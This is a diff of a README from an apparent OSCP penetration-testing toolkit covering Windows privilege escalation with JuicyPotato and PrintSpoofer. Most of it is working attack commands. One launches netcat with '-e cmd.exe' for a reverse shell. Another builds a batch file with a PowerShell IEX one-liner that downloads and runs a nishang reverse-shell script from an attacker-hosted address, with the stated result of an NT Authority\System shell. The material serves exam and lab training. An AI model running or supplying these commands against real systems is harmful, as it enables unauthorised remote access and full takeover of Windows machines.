1337-L3V1ATH0N/OSCP-TOOLS/README.md

 --> For CLSID - http://ohpe.it/juicy-potato/CLSID/

-~ Command : juicypotato.exe -l 1337 -t * -p "C:\Windows\Tasks\nc.exe IP PORT -e cmd.exe"
+~ Command : juicypotato.exe -l 1337 -t * -p "C:\Windows\Tasks\nc.exe" -a "IP PORT -e cmd.exe"
     TIP : If upper command doesn't work then try to do the following thing:
     1. Get ready with the nishang reverse shell script edit it with necessary data.
     Then create a bat file on any machine with IEX file downloader one-liner.--- echo powershell -c "IEX (new-object net.webclient).('http://10.10.16.5/shell.ps1')" > shell.bat ---
     2. Then host a python web server and download the .bat file in target machine.
 After downloading run it as follows:
     3. .\jp.exe -t * -l 1337 -p shell.bat (This will give shell as NT Authority\System) If this doesn't work then also change the CLSID using -c parameter.

-# PrinSpoofer Exploit on SEImpersonate :
+# PrintSpoofer Exploit on SEImpersonate :

 --> If the host is Windows Server 2016, 2019 or Windows 10 use this exploit if it has SEImpersoante permission - https://github.com/dievus/printspoofer/blob/master/PrintSpoofer.exe